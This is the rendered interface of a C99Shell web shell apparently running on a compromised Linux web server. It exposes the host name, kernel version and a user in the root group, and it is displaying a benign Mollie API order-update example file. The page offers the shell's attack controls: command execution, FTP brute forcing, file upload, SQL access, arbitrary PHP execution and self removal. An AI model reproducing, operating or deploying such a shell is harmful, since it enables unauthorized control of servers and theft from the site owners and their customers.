!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/mollie/mollie-api-php/examples/orders/   drwxr-xr-x
Free 28.78 GB of 117.98 GB (24.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     update-order.php (1.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * How to update an order with the Mollie API
 */

try {
    
/*
     * Initialize the Mollie API library with your API key.
     *
     * See: https://www.mollie.com/dashboard/developers/api-keys
     */
    
require "../initialize.php";

    
/*
     * Order parameters:
     *   billingAddress   The billing person and address for the order.
     *   shippingAddress  The shipping address for the order.
     *   orderNumber      The order number. For example, 16738.
     *   redirectUrl      The URL your customer will be redirected to after the payment process.
     *   webhookUrl       Set the webhook URL, where we will send order status changes to.
     */


    
$order $mollie->orders->get("ord_kEn1PlbGa");
    
$order->billingAddress->organizationName "Mollie B.V.";
    
$order->billingAddress->streetAndNumber "Keizersgracht 126";
    
$order->billingAddress->city "Amsterdam";
    
$order->billingAddress->region "Noord-Holland";
    
$order->billingAddress->postalCode "1234AB";
    
$order->billingAddress->country "NL";
    
$order->billingAddress->title "Dhr";
    
$order->billingAddress->givenName "Piet";
    
$order->billingAddress->familyName "Mondriaan";
    
$order->billingAddress->email "piet@mondriaan.com";
    
$order->billingAddress->phone "+31208202070";
    
$order->update();

    
/*
     * Send the customer off to complete the order payment.
     * This request should always be a GET, thus we enforce 303 http response code
     */
    
header("Location: " $order->getCheckoutUrl(), true303);
} catch (
\Mollie\Api\Exceptions\ApiException $e) {
    echo 
"API call failed: " htmlspecialchars($e->getMessage());
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--